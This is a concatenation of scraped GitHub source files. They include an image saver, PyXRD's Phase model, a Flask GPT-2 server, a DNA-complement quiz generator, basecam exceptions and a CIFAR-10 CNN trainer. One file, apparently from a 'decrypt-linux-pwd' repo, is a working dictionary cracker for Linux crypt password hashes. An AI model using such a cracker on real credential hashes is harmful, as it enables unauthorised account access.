\"\"\"多张图片保存[[链接:文件保存地址]]\"\"\"\r\n self.astrict = astrict\r\n self.__semaphore = asyncio.Semaphore(self.astrict) # 限制并发量为500\r\n self.__data_detection(image_iteration)\r\n self.__create_loop(image_iteration)\r\n\r\n @staticmethod\r\n def __data_detection(iteration_data):\r\n for url_data in iteration_data:\r\n if 'http' != str(url_data[0][:4]).lower():\r\n raise ValueError('数据中的第一个参数不是一个链接,因为它没有携带http协议')\r\n if '.' not in str(url_data[1]):\r\n raise ValueError('数据中的第二个参数没有后缀名称')\r\n\r\n\r\nimage_save = ImageSave().image_save\r\nimages_save = ImageSave().images_save\r\n","repo_name":"kuangjianke/crawles","sub_path":"crawles/data_save/image_save.py","file_name":"image_save.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5220700013","text":"from warnings import warn\nfrom random import choice\n\nfrom mvc import Observer\nfrom mvc.observers import ListObserver\nfrom mvc.models.properties import (\n StringProperty, SignalMixin, BoolProperty, LabeledProperty,\n FloatProperty, ListProperty\n)\n\nfrom pyxrd.generic.io import storables, get_case_insensitive_glob\n\nfrom pyxrd.generic.models.properties import InheritableMixin, ObserveChildMixin\nfrom pyxrd.refinement.refinables.properties import RefinableMixin\nfrom pyxrd.refinement.refinables.mixins import RefinementGroup\nfrom pyxrd.refinement.refinables.metaclasses import PyXRDRefinableMeta\n\nfrom pyxrd.probabilities.models import get_correct_probability_model\n\nfrom .abstract_phase import AbstractPhase\nfrom .CSDS import DritsCSDSDistribution\nfrom .component import Component\n\n@storables.register()\nclass Phase(RefinementGroup, AbstractPhase, metaclass=PyXRDRefinableMeta):\n\n # MODEL INTEL:\n class Meta(AbstractPhase.Meta):\n store_id = \"Phase\"\n file_filters = [\n (\"Phase file\", get_case_insensitive_glob(\"*.PHS\")),\n ]\n\n _data_object = None\n @property\n def data_object(self):\n self._data_object.type = \"Phase\"\n self._data_object.valid_probs = (all(self.probabilities.P_valid) and all(self.probabilities.W_valid))\n\n if self._data_object.valid_probs:\n self._data_object.sigma_star = self.sigma_star\n self._data_object.CSDS = self.CSDS_distribution.data_object\n\n self._data_object.G = self.G\n self._data_object.W = self.probabilities.get_distribution_matrix()\n self._data_object.P = self.probabilities.get_probability_matrix()\n\n 
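# W and P come from the attached probability model: W is the component\n            # distribution (weight) matrix and P holds the layer-stacking transition\n            # probabilities; each wrapped component then contributes its own data_object.\n            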
self._data_object.components = [None] * len(self.components)\n for i, comp in enumerate(self.components):\n self._data_object.components[i] = comp.data_object\n else:\n self._data_object.sigma_star = None\n self._data_object.CSDS = None\n self._data_object.G = None\n self._data_object.W = None\n self._data_object.P = None\n self._data_object.components = None\n\n return self._data_object\n\n project = property(AbstractPhase.parent.fget, AbstractPhase.parent.fset)\n\n # PROPERTIES:\n\n #: Flag indicating whether the CSDS distribution is inherited from the\n #: :attr:`based_on` phase or not.\n @BoolProperty(\n default=False, text=\"Inh. mean CSDS\",\n visible=True, persistent=True, tabular=True\n )\n def inherit_CSDS_distribution(self):\n return self._CSDS_distribution.inherited\n @inherit_CSDS_distribution.setter\n def inherit_CSDS_distribution(self, value):\n self._CSDS_distribution.inherited = value\n\n #: Flag indicating whether to inherit the display color from the\n #: :attr:`based_on` phase or not.\n inherit_display_color = BoolProperty(\n default=False, text=\"Inh. display color\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: Flag indicating whether to inherit the sigma star value from the\n #: :attr:`based_on` phase or not.\n inherit_sigma_star = BoolProperty(\n default=False, text=\"Inh. sigma star\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n _based_on_index = None # temporary property\n _based_on_uuid = None # temporary property\n\n #: The :class:`~Phase` instance this phase is based on\n based_on = LabeledProperty(\n default=None, text=\"Based on phase\",\n visible=True, persistent=False, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, ObserveChildMixin)\n )\n @based_on.setter\n def based_on(self, value):\n old = type(self).based_on._get(self)\n if value == None or value.get_based_on_root() == self or value.parent != self.parent:\n value = None\n if value != old:\n type(self).based_on._set(self, value)\n for component in self.components:\n component.linked_with = None\n\n # INHERITABLE PROPERTIES:\n\n #: The sigma star orientation factor\n sigma_star = FloatProperty(\n default=3.0, text=\"σ* [°]\", math_text=\"$\\sigma^*$ [°]\",\n minimum=0.0, maximum=90.0,\n visible=True, persistent=True, tabular=True, refinable=True,\n inheritable=True, inherit_flag=\"inherit_sigma_star\", inherit_from=\"based_on.sigma_star\",\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, RefinableMixin, InheritableMixin)\n )\n\n # A :class:`~pyxrd.phases.models.CSDS` instance\n CSDS_distribution = LabeledProperty(\n default=None, text=\"CSDS Distribution\",\n visible=True, persistent=True, tabular=True, refinable=True,\n inheritable=True, inherit_flag=\"inherit_CSDS_distribution\", inherit_from=\"based_on.CSDS_distribution\",\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, RefinableMixin, InheritableMixin, ObserveChildMixin)\n )\n\n # A :class:`~pyxrd._probabilities.models._AbstractProbability` subclass instance\n probabilities = LabeledProperty(\n default=None, text=\"Probabilities\",\n visible=True, persistent=True, tabular=True, refinable=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin, RefinableMixin, ObserveChildMixin)\n )\n @probabilities.setter\n def probabilities(self, value):\n type(self).probabilities._set(self, value)\n if value is not None:\n value.update()\n\n #: The color this phase's X-ray 
diffraction pattern should have.\n display_color = StringProperty(\n fset=AbstractPhase.display_color.fset,\n fget=AbstractPhase.display_color.fget,\n fdel=AbstractPhase.display_color.fdel,\n doc=AbstractPhase.display_color.__doc__,\n default=\"#008600\", text=\"Display color\",\n visible=True, persistent=True, tabular=True, widget_type='color',\n inheritable=True, inherit_flag=\"inherit_display_color\", inherit_from=\"based_on.display_color\",\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin, InheritableMixin)\n )\n\n #: The list of components this phase consists of\n components = ListProperty(\n default=None, text=\"Components\",\n visible=True, persistent=True, tabular=True, refinable=True,\n widget_type=\"custom\", data_type=Component,\n mix_with=(RefinableMixin,)\n )\n\n #: The # of components\n @AbstractPhase.G.getter\n def G(self):\n if self.components is not None:\n return len(self.components)\n else:\n return 0\n\n #: The Reichweite (R) of the probability model\n @AbstractPhase.R.getter\n def R(self):\n if self.probabilities:\n return self.probabilities.R\n\n # Flag indicating whether or not the links (based_on and linked_with) should\n # be saved as well.\n save_links = True\n\n # REFINEMENT GROUP IMPLEMENTATION:\n @property\n def refine_title(self):\n return self.name\n\n @property\n def refine_descriptor_data(self):\n return dict(\n phase_name=self.refine_title,\n component_name=\"*\"\n )\n\n # ------------------------------------------------------------\n # Initialization and other internals\n # ------------------------------------------------------------\n def __init__(self, *args, **kwargs):\n\n my_kwargs = self.pop_kwargs(kwargs,\n \"data_CSDS_distribution\", \"data_sigma_star\", \"data_components\",\n \"data_G\", \"G\", \"data_R\", \"R\",\n \"data_probabilities\", \"based_on_uuid\", \"based_on_index\",\n \"inherit_probabilities\",\n *[prop.label for prop in Phase.Meta.get_local_persistent_properties()]\n )\n super(Phase, self).__init__(*args, **kwargs)\n kwargs = my_kwargs\n\n with self.data_changed.hold():\n\n CSDS_distribution = self.get_kwarg(kwargs, None, \"CSDS_distribution\", \"data_CSDS_distribution\")\n self.CSDS_distribution = self.parse_init_arg(\n CSDS_distribution, DritsCSDSDistribution, child=True,\n default_is_class=True, parent=self\n )\n self.inherit_CSDS_distribution = self.get_kwarg(kwargs, False, \"inherit_CSDS_distribution\")\n\n self.display_color = self.get_kwarg(kwargs, choice(self.line_colors), \"display_color\")\n self.inherit_display_color = self.get_kwarg(kwargs, False, \"inherit_display_color\")\n\n self.sigma_star = self.get_kwarg(kwargs, self.sigma_star, \"sigma_star\", \"data_sigma_star\")\n self.inherit_sigma_star = self.get_kwarg(kwargs, False, \"inherit_sigma_star\")\n\n self.components = self.get_list(kwargs, [], \"components\", \"data_components\", parent=self)\n\n G = int(self.get_kwarg(kwargs, 1, \"G\", \"data_G\"))\n R = int(self.get_kwarg(kwargs, 0, \"R\", \"data_R\"))\n if G is not None and G > 0:\n for i in range(len(self.components), G):\n new_comp = Component(name=\"Component %d\" % (i + 1), parent=self)\n self.components.append(new_comp)\n self.observe_model(new_comp)\n\n # Observe components\n for component in self.components:\n self.observe_model(component)\n\n # Connect signals to lists and dicts:\n self._components_observer = ListObserver(\n self.on_component_inserted,\n self.on_component_removed,\n prop_name=\"components\",\n model=self\n )\n\n self.probabilities = self.parse_init_arg(\n self.get_kwarg(kwargs, None, \"probabilities\", 
\"data_probabilities\"),\n get_correct_probability_model(R, G), default_is_class=True, child=True)\n self.probabilities.update() # force an update\n inherit_probabilities = kwargs.pop(\"inherit_probabilities\", None)\n if inherit_probabilities is not None:\n for prop in self.probabilities.Meta.get_inheritable_properties():\n setattr(self.probabilities, prop.inherit_flag, bool(inherit_probabilities))\n\n self._based_on_uuid = self.get_kwarg(kwargs, None, \"based_on_uuid\")\n self._based_on_index = self.get_kwarg(kwargs, None, \"based_on_index\")\n\n def __repr__(self):\n return \"Phase(name='%s', based_on=%r)\" % (self.name, self.based_on)\n\n # ------------------------------------------------------------\n # Notifications of observable properties\n # ------------------------------------------------------------\n def on_component_inserted(self, item):\n # Set parent and observe the new component (visuals changed signals):\n if item.parent != self: item.parent = self\n self.observe_model(item)\n\n def on_component_removed(self, item):\n with self.data_changed.hold_and_emit():\n # Clear parent & stop observing:\n item.parent = None\n self.relieve_model(item)\n\n @Observer.observe(\"data_changed\", signal=True)\n def notify_data_changed(self, model, prop_name, info):\n if isinstance(model, Phase) and model == self.based_on:\n with self.data_changed.hold():\n # make sure inherited probabilities are up-to-date\n self.probabilities.update()\n self.data_changed.emit(arg=\"based_on\")\n else:\n self.data_changed.emit()\n\n @Observer.observe(\"visuals_changed\", signal=True)\n def notify_visuals_changed(self, model, prop_name, info):\n self.visuals_changed.emit()\n\n # ------------------------------------------------------------\n # Input/Output stuff\n # ------------------------------------------------------------\n def resolve_json_references(self):\n # Set the based on and linked with variables:\n if hasattr(self, \"_based_on_uuid\") and self._based_on_uuid is not None:\n self.based_on = type(type(self)).object_pool.get_object(self._based_on_uuid)\n del self._based_on_uuid\n elif hasattr(self, \"_based_on_index\") and self._based_on_index is not None and self._based_on_index != -1:\n warn(\"The use of object indices is deprecated since version 0.4. 
Please switch to using object UUIDs.\", DeprecationWarning)\n self.based_on = self.parent.phases.get_user_from_index(self._based_on_index)\n del self._based_on_index\n for component in self.components:\n component.resolve_json_references()\n with self.data_changed.hold():\n # make sure inherited probabilities are up-to-date\n self.probabilities.update()\n\n def _pre_multi_save(self, phases, ordered_phases):\n ## Override from base class\n\n if self.based_on != \"\" and not self.based_on in phases:\n self.save_links = False\n Component.export_atom_types = True\n for component in self.components:\n component.save_links = self.save_links\n\n # Make sure parent is first in ordered list:\n if self.based_on in phases:\n index = ordered_phases.index(self)\n index2 = ordered_phases.index(self.based_on)\n if index < index2:\n ordered_phases.remove(self.based_on)\n ordered_phases.insert(index, self.based_on)\n\n def _post_multi_save(self):\n ## Override from base class\n self.save_links = True\n for component in self.components:\n component.save_links = True\n Component.export_atom_types = False\n\n def json_properties(self):\n retval = super(Phase, self).json_properties()\n if not self.save_links:\n for prop in self.Meta.all_properties:\n if getattr(prop, \"inherit_flag\", False):\n retval[prop.inherit_flag] = False\n retval[\"based_on_uuid\"] = \"\"\n else:\n retval[\"based_on_uuid\"] = self.based_on.uuid if self.based_on else \"\"\n return retval\n\n # ------------------------------------------------------------\n # Methods & Functions\n # ------------------------------------------------------------\n def _update_interference_distributions(self):\n return self.CSDS_distribution.distrib\n\n def get_based_on_root(self):\n \"\"\"\n Gets the root object in the based_on chain\n \"\"\"\n if self.based_on is not None:\n return self.based_on.get_based_on_root()\n else:\n return self\n\n pass # end of class\n","repo_name":"PyXRD/PyXRD","sub_path":"pyxrd/phases/models/phase.py","file_name":"phase.py","file_ext":"py","file_size_in_byte":14579,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"70927413354","text":"from flask import Flask, request\nfrom GPT2Inference import GPT2\n\napp = Flask(__name__)\ngptModel = GPT2()\n\n@app.route('/')\ndef hello():\n return 'Welcome to the GPT server! \\n use /predict[text] for prediction'\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n text = request.form['text']\n label = gptModel.predict(text)\n label = '' + str(label)\n return label\n\nif __name__ == '__main__':\n app.run(debug = False, port=5000)","repo_name":"hritik5102/Fake-news-classification-model","sub_path":"Server-GPT2/gpt-server.py","file_name":"gpt-server.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"33852594829","text":"#!/usr/bin/env python\n\nimport sys\nimport seqlib\nimport random\n\nif __name__ == '__main__':\n\tif len(sys.argv) >= 2:\n\t\tseqlen = int(sys.argv[1])\n\telse:\n\t\tseqlen = 7\n\n\t#============================\n\tseq = seqlib.makeSequence(seqlen)\n\tanswer = seqlib.flip(seqlib.complement(seq))\n\n\t#============================\n\tif random.random() < 0.5:\n\t\tprint(\"1. Which one of the following sequences is complementary to the sequence 5'-%s-3'? Hint: pay attention to the 5' and 3' directions!\"%(seq))\n\telse:\n\t\tprint(\"1. 
Which one of the following sequences is complementary to the sequence 3'-%s-5'? Hint: pay attention to the 5' and 3' directions!\"%(seqlib.flip(seq)))\n\n\t#============================\n\tchoices = []\n\thalf = int(seqlen//2)\n\n\t#choice 1\n\tchoices.append(seq)\n\t#choice 2\n\tchoices.append(seqlib.flip(seq))\n\t#choice 3\n\tchoices.append(answer)\n\t#choice 4\n\tchoices.append(seqlib.flip(answer))\n\t#choice 5\n\tnube = seq[:half] + answer[half:]\n\tchoices.append(nube)\n\n\t#============================\n\trandom.shuffle(choices)\n\tcharlist = \"ABCDE\"\n\tfor i in range(len(choices)):\n\t\tchoice_msg = choices[i]\n\t\tletter = charlist[i]\n\t\tprefix = \"\"\n\t\tif choice_msg == answer:\n\t\t\tprefix = \"*\"\n\t\tprint(\"%s%s. 5'-%s-3'\"%(prefix, letter, choice_msg))\n\t\t\n\t\t\n","repo_name":"vosslab/genetics-problems","sub_path":"complement_prime.py","file_name":"complement_prime.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41976685347","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# @Author: José Sánchez-Gallego (gallegoj@uw.edu)\n# @Date: 2019-08-05\n# @Filename: exceptions.py\n# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)\n\nimport inspect\n\nfrom . import camera\n\n\nclass CameraError(Exception):\n \"\"\"A custom core exception\"\"\"\n\n def __init__(self, message=\"\"):\n stack = inspect.stack()\n f_locals = stack[1][0].f_locals\n\n if \"self\" in f_locals:\n class_ = f_locals[\"self\"]\n if isinstance(class_, camera.BaseCamera):\n camera_name = f_locals[\"self\"].name\n elif isinstance(class_, camera.CameraSystem):\n camera_name = \"CAMERA_SYSTEM\"\n else:\n camera_name = \"UNKNOWN\"\n super().__init__(f\"{camera_name} - {message}\")\n else:\n super().__init__(f\"{message}\")\n\n\nclass CameraConnectionError(CameraError):\n \"\"\"An error to be raised if the camera fails to connect/disconnect.\"\"\"\n\n\nclass ExposureError(Exception):\n \"\"\"The exposure failed.\"\"\"\n\n\nclass FITSModelError(Exception):\n \"\"\"An error related to the FITS model.\"\"\"\n\n\nclass CardError(FITSModelError):\n \"\"\"Error raised by a FITS `.Card`.\"\"\"\n\n\nclass CameraWarning(UserWarning):\n \"\"\"Base warning.\"\"\"\n\n def __init__(self, message, *args, **kwargs):\n stack = inspect.stack()\n f_locals = stack[1][0].f_locals\n\n if \"self\" in f_locals:\n class_ = f_locals[\"self\"]\n if isinstance(class_, camera.BaseCamera):\n camera_name = f_locals[\"self\"].name\n elif isinstance(class_, camera.CameraSystem):\n camera_name = \"CAMERA_SYSTEM\"\n else:\n camera_name = \"UNKNOWN\"\n super().__init__(f\"{camera_name} - {message}\")\n else:\n super().__init__(f\"{message}\")\n\n\nclass ExposureWarning(UserWarning):\n \"\"\"Warning for exposures.\"\"\"\n\n\nclass FITSModelWarning(UserWarning):\n \"\"\"A warning related to the FITS model.\"\"\"\n\n\nclass CardWarning(FITSModelWarning):\n \"\"\"Warning raised by a FITS `.Card`.\"\"\"\n","repo_name":"sdss/basecam","sub_path":"basecam/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73373159593","text":"#!/usr/bin/python3\nimport re, crypt, os\n\ndef main():\n hash = getUserInfo() # mostrar banner de bienvenida y pedir al usuario la informacion necesaria\n\n if not isValidHash(hash): # verificar si el hash es valido o no\n print(\"Hash invalido, por 
favor ingrese un hash en el formato especificado.\")\n exit(0)\n\n split_hash = re.split(\"\\$\", hash) # partir el hash en 3 partes (devuelve un arreglo de 4 partes)\n algo = getAlgo(split_hash[1]) # validar el algoritmo\n if algo is None:\n print(\"Algoritmo invalido, utilice 1 para md5, 2a para blowfish, 2y para blowfish con manejo de caracteres de 8 bits, 5 para sha256 o 6 para sha512\")\n exit(0)\n\n # imprimir informacion del algoritmo\n print(\"Algoritmo identificado: %s\" % algo['name'])\n\n decrypted_pwd = performBruteForce(split_hash)\n if decrypted_pwd is None:\n print(\"No se pudo obtener la contraseña, lo sentimos... :( \")\n exit(0)\n\n print(\"Felicidades!! La contraseña es \\\"%s\\\" (sin las comillas) :) \" % decrypted_pwd)\n\n\ndef getUserInfo():\n return input(\"Por favor ingrese el hash de la contraseña que desea desencriptar. El formato debe de ser $algoritmo$salt$contraseña: \")\n\n\ndef isValidHash(hash):\n return re.search(\"^\\$[1256]{1}[ay]{0,1}\\$[^:]*\\$[^:]*$\", hash)\n\n\ndef getAlgo(algo):\n valid_algorithms = {\n '1': {'id': '1', 'name': 'md5'},\n '2a': {'id': '2a', 'name': 'blowfish'},\n '2y': {'id': '2y', 'name': 'blowfish with correct 8 bit character support'},\n '5': {'id': '5', 'name': 'sha256'},\n '6': {'id': '6', 'name': 'sha512'}\n }\n for alg, data in valid_algorithms.items():\n if alg == algo:\n return data\n return None\n\ndef performBruteForce(split_hash):\n counter_palabras = 0\n hash_a_encontrar = \"$\" + split_hash[1] + \"$\" + split_hash[2] + \"$\" + split_hash[3]\n salt = \"$\" + split_hash[1] + \"$\" + split_hash[2]\n print(\"Buscando hash \\\"%s\\\" con salt \\\"%s\\\"\" % (hash_a_encontrar, salt))\n cwd = os.getcwd()\n for file in os.listdir(cwd):\n if file.endswith(\".txt\"):\n print(\"Buscando en archivo %s...\" % file)\n f = open(file, \"r\")\n for line in f:\n line = line.rstrip()\n counter_palabras += 1\n hash_resultante = crypt.crypt(line, salt)\n if hash_a_encontrar == hash_resultante:\n print(\"Total de lineas analizadas: %i. 
Archivo donde se encontro: %s\" % (counter_palabras, file))\n return line\n f.close()\n\n return None\n\nif __name__ == \"__main__\":\n main()","repo_name":"gabriel2297/decrypt-linux-pwd","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26046763409","text":"import cnnCIFAR_plots\r\nimport cnnCIFAR_utilsLoadData\r\nimport tensorflow as tf\r\nimport prettytensor as pt\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport time\r\nimport numpy as np\r\nfrom datetime import timedelta\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n# variables globales\r\nimg_size_cropped = 24\r\ntrain_batch_size = 64\r\nbatch_size = 256\r\n\r\nnum_classes_ = cnnCIFAR_utilsLoadData.num_classes\r\nimg_size_ = cnnCIFAR_utilsLoadData.img_size\r\nnum_channels_ = cnnCIFAR_utilsLoadData.num_channels\r\n\r\ndef getTestImage(i):\r\n return images_test[i, :, :, :], cls_test[i]\r\n\r\ndef preProcessImage(image, training): \r\n if training:\r\n # para la fase de entrenamiento \r\n image = tf.random_crop(image, size=[img_size_cropped, img_size_cropped, cnnCIFAR_utilsLoadData.num_channels])\r\n \r\n image = tf.image.random_flip_left_right(image)\r\n \r\n image = tf.image.random_hue(image, max_delta=0.05)\r\n image = tf.image.random_contrast(image, lower=0.3, upper=1.0)\r\n image = tf.image.random_brightness(image, max_delta=0.2)\r\n image = tf.image.random_saturation(image, lower=0.0, upper=2.0)\r\n \r\n image = tf.minimum(image, 1.0)\r\n image = tf.maximum(image, 0.0)\r\n else:\r\n image = tf.image.resize_image_with_crop_or_pad(image,\r\n target_height=img_size_cropped,\r\n target_width=img_size_cropped)\r\n return image\r\n\r\ndef preProcess(images, training): \r\n images = tf.map_fn(lambda image: preProcessImage(image, training), images)\r\n\r\n return images\r\n\r\ndef mainNetwork(images, training): \r\n x_pretty = pt.wrap(images)\r\n\r\n if training:\r\n phase = pt.Phase.train\r\n else:\r\n phase = pt.Phase.infer\r\n\r\n with pt.defaults_scope(activation_fn=tf.nn.relu, phase=phase):\r\n y_pred, loss = x_pretty.\\\r\n conv2d(kernel=5, depth=64, name='layer_conv1', batch_normalize=True).\\\r\n max_pool(kernel=2, stride=2).\\\r\n conv2d(kernel=5, depth=64, name='layer_conv2').\\\r\n max_pool(kernel=2, stride=2).\\\r\n flatten().\\\r\n fully_connected(size=256, name='layer_fc1').\\\r\n fully_connected(size=128, name='layer_fc2').\\\r\n softmax_classifier(num_classes=num_classes_, labels=y_true)\r\n\r\n return y_pred, loss \r\n\r\ndef createNetwork(training):\r\n with tf.variable_scope('network', reuse=not training):\r\n images = x\r\n images = preProcess(images=images, training=training)\r\n y_pred, loss = mainNetwork(images=images, training=training)\r\n \r\n return y_pred, loss \r\n\r\ndef randomBatch(): \r\n num_images = len(images_train) \r\n idx = np.random.choice(num_images,\r\n size=train_batch_size,\r\n replace=False) \r\n x_batch = images_train[idx, :, :, :]\r\n y_batch = labels_train[idx, :]\r\n\r\n return x_batch, y_batch\t\r\n\r\ndef optimize(num_iterations):\r\n \r\n start_time = time.time()\r\n\r\n for i in range(num_iterations): \r\n # x_batch => batch de imagenes\r\n # y_true_batch => batch de los labels de las imagenes\r\n x_batch, y_true_batch = randomBatch()\r\n\r\n # coloca los batchs en los placeholders\r\n feed_dict_train = {x: x_batch,\r\n y_true: y_true_batch}\r\n\r\n # Run the optimizer using this batch of training data.\r\n # TensorFlow assigns 
the variables in feed_dict_train\r\n # to the placeholder variables and then runs the optimizer.\r\n # We also want to retrieve the global_step counter.\r\n i_global, _ = session.run([global_step, optimizer],\r\n feed_dict=feed_dict_train)\r\n\r\n # imprime el estado cada 100 iterations (and last).\r\n if (i_global % 100 == 0) or (i == num_iterations - 1):\r\n # calcula la exactitud por el batch procesado\r\n batch_acc = session.run(accuracy,\r\n feed_dict=feed_dict_train) \r\n msg = \"Global Step: {0:>6}, Training Batch Accuracy: {1:>6.1%}\"\r\n print(msg.format(i_global, batch_acc))\r\n\r\n # guarda el checkpoint cada 1000 iteraciones (y la ultima).\r\n if (i_global % 1000 == 0) or (i == num_iterations - 1):\r\n # Guarda todas las variables del TensorFlow graph al\r\n # checkpoint. \r\n saver.save(session,\r\n save_path=save_path,\r\n global_step=global_step)\r\n\r\n print(\"Saved checkpoint.\")\r\n \r\n end_time = time.time() \r\n time_dif = end_time - start_time \r\n print(\"Tiempo empleado: \" + str(timedelta(seconds=int(round(time_dif)))))\r\n\r\ndef predict_cls(images, labels, cls_true):\r\n # Number of images.\r\n num_images = len(images) \r\n cls_pred = np.zeros(shape=num_images, dtype=np.int)\r\n\r\n # Prediciendo la clase por batch. \r\n i = 0\r\n\r\n while i < num_images:\r\n # The ending index for the next batch is denoted j.\r\n j = min(i + batch_size, num_images)\r\n \r\n feed_dict = {x: images[i:j, :],\r\n y_true: labels[i:j, :]}\r\n\r\n # Se predice la clase usando TensorFlow.\r\n cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict) \r\n i = j\r\n\r\n # Array donde la imagen es correctamente predecida\r\n correct = (cls_true == cls_pred)\r\n return correct, cls_pred\r\n\r\ndef classification_accuracy(correct): \r\n # Retorna classification-accuracy\r\n # y el numero de clasificados correctamente.\r\n return correct.mean(), correct.sum()\r\n\r\ndef print_test_accuracy():\r\n # Para todas las imagenes en el test-set,\r\n # calcula la clase predecida y cual de ellas es correcta.\r\n correct, cls_pred = predict_cls(images = images_test, labels = labels_test, cls_true = cls_test)\r\n \r\n acc, num_correct = classification_accuracy(correct)\r\n num_images = len(correct)\r\n\r\n # Print the accuracy.\r\n msg = \"Exactitud en el Test-Set: {0:.1%} ({1} / {2})\"\r\n print(msg.format(acc, num_correct, num_images))\r\n \r\n print(\"Ejemplo de errores:\") \r\n incorrect = (correct == False)\r\n images = images_test[incorrect] \r\n # Obteniendo las clases predecidas para estas imagenes.\r\n cls_pred_errors = cls_pred[incorrect]\r\n # Obteniendo las clases verdaderas para estas imagenes.\r\n cls_true_errors = cls_test[incorrect]\r\n\r\n # Plot some examples of mis-classifications, if desired.\r\n cnnCIFAR_plots.plot_images('Ejemplos de errores de prediccion', class_names, images=images[0:9], cls_true=cls_true_errors[0:9], cls_pred=cls_pred_errors[0:9])\r\n\r\n # Plot matriz de confunsion\r\n cm = confusion_matrix(y_true=cls_test, # True class for test-set.\r\n y_pred=cls_pred) # Predicted class.\r\n\r\n # Imprime la matriz de confunsion como texto.\r\n for i in range(num_classes_):\r\n # Append the class-name to each line.\r\n class_name = \"({}) {}\".format(i, class_names[i])\r\n print(cm[i, :], class_name)\r\n\r\n # Imprimiendo las clases.\r\n class_numbers = [\" ({0})\".format(i) for i in range(num_classes_)]\r\n print(\"\".join(class_numbers)) \r\n\r\ndef testCNN(array):\r\n for elem in array: \r\n img, cls = getTestImage(elem)\r\n label_pred, cls_pred = session.run([y_pred, 
y_pred_cls], feed_dict={x: [img]})\r\n np.set_printoptions(precision=3, suppress=True) \r\n cnnCIFAR_plots.plot_image(img, class_names[cls], class_names[cls_pred[0]])\r\n \r\nif __name__ == \"__main__\":\r\n \r\n\t# cnnCIFAR_utilsLoadData\t\r\n\tprint(\"\\t \\t === CARGANDO DATA ===\")\r\n\tclass_names = cnnCIFAR_utilsLoadData.loadClassNames()\r\n\timages_train, cls_train, labels_train = cnnCIFAR_utilsLoadData.loadTrainingData()\r\n\timages_test, cls_test, labels_test = cnnCIFAR_utilsLoadData.loadTestData()\r\n\tprint(\"Size of:\")\r\n\tprint(\"- Training-set:\\t\\t{}\".format(len(images_train)))\r\n\tprint(\"- Test-set:\\t\\t{}\".format(len(images_test)))\r\n\t\t\r\n\t# Plot the images and labels using our helper-function above.\r\n\t#cnnCIFAR_plots.plot_images('imagenes al azar', class_names, images=images_test[0:9], cls_true=cls_test[0:9], smooth=True)\r\n\r\n\tprint(\"\\t \\t === LEVANTANDO RED NEURONAL ===\")\t\r\n\t# PLACEHOLDERS \r\n\tprint(\"\\t \\t === CREANDO PLACEHOLDERS === \")\t\r\n\tx = tf.placeholder(tf.float32, shape=[None, img_size_, img_size_, num_channels_], name='x')\r\n\ty_true = tf.placeholder(tf.float32, shape=[None, num_classes_], name='y_true')\r\n\ty_true_cls = tf.argmax(y_true, dimension=1)\r\n\tprint(\"\\t \\t === PLACEHOLDERS CREADOS === \\n\")\r\n\r\n\t# CREATE TRAINING NETWORK\r\n\tglobal_step = tf.Variable(initial_value=0, name='global_step', trainable=False)\r\n\t# red neuronal para training\r\n\t_, loss = createNetwork(training=True)\r\n\t# optimiza la los-function\r\n\toptimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss, global_step=global_step)\r\n\tprint(\"\\t \\t === RED DE TRAINING CREADA === \\n\")\r\n\r\n\t# CREATE TESTING NETWORK \r\n\ty_pred,_ = createNetwork(training=False)\r\n\ty_pred_cls = tf.argmax(y_pred, dimension=1)\r\n\tcorrect_prediction = tf.equal(y_pred_cls, y_true_cls)\r\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\tprint(\"\\t \\t === RED DE TESTING CREADA === \\n\\n\")\r\n\r\n\tprint(\"\\t \\t === EJECUTANDO RED NEURONAL === \")\r\n\tsaver = tf.train.Saver()\r\n\r\n\tsession = tf.Session()\r\n\tsave_dir = 'checkpoints/'\r\n\tif not os.path.exists(save_dir):\r\n\t\tos.makedirs(save_dir)\r\n\tsave_path = os.path.join(save_dir, 'cifar10_cnn')\r\n\ttry:\r\n\t print(\"Intentando restaurar el ultimo punto\")\t \r\n\t last_chk_path = tf.train.latest_checkpoint(checkpoint_dir=save_dir)\r\n\r\n\t # cargando la data desde el ultimo punto\r\n\t saver.restore(session, save_path=last_chk_path)\r\n\t \r\n\t print(\"Checkpoint restaurado desde \", last_chk_path)\r\n\texcept:\r\n\t # If the above failed for some reason, simply\r\n\t print(\"Fallo la restauracion del checkpoint. 
